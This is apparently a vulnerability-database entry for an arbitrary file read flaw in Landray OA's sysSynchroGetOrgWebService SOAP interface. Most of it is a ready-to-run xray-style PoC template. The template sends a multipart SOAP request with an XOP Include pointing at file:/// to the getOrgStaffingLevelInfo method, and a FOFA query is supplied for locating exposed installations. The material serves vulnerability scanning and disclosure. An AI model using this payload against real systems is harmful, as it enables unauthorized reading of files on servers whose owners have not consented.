landray-oa-sysSynchroGetOrgWebService-fileread: Landray OA sysSynchroGetOrgWebService File Read

日期: 2025-09-01 | 影响软件: Landray OA | POC: 已公开

漏洞描述

Landray OA System sysSynchroGetOrgWebService interface has an arbitrary file read vulnerability. The vulnerability exists in the getOrgStaffingLevelInfo method which can be exploited to read arbitrary files on the system. FOFA: body="Com_Parameter"

PoC代码[已公开]

id: landray-oa-sysSynchroGetOrgWebService-fileread
info:
  name: Landray OA sysSynchroGetOrgWebService File Read
  author: ZacharyZcR
  severity: high
  verified: true
  description: |
    Landray OA System sysSynchroGetOrgWebService interface has an arbitrary file read vulnerability.
    The vulnerability exists in the getOrgStaffingLevelInfo method which can be exploited to read arbitrary files on the system.
    FOFA: body="Com_Parameter"
  reference:
    - https://github.com/wy876/POC/blob/main/%E8%93%9D%E5%87%8COA/%E8%93%9D%E5%87%8CEKP%E7%B3%BB%E7%BB%9F%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88.md
  tags: landray,lfi,fileread
  created: 2024/12/30

set:
  rboundary: randomLowercase(8)
rules:
  r0:
    request:
      method: POST
      path: /sys/webservice/sysSynchroGetOrgWebService
      headers:
        Content-Type: multipart/related; boundary=----WebKitFormBoundary{{rboundary}}
        SOAPAction: ""
        Accept-Encoding: gzip, deflate
      body: |
        ------WebKitFormBoundary{{rboundary}}
        Content-Disposition: form-data; name="a"

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://out.webservice.organization.sys.kmss.landray.com/">
        <soapenv:Header/>
        <soapenv:Body>
            <web:getOrgStaffingLevelInfo>
                <arg0>
                    <beginTimeStamp>a</beginTimeStamp>
                    <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///"/></count>
                </arg0>
            </web:getOrgStaffingLevelInfo>
        </soapenv:Body>
        </soapenv:Envelope>
        ------WebKitFormBoundary{{rboundary}}--
    expression: response.status == 500 && response.body.bcontains(b'Unmarshalling Error')
expression: r0()

相关漏洞推荐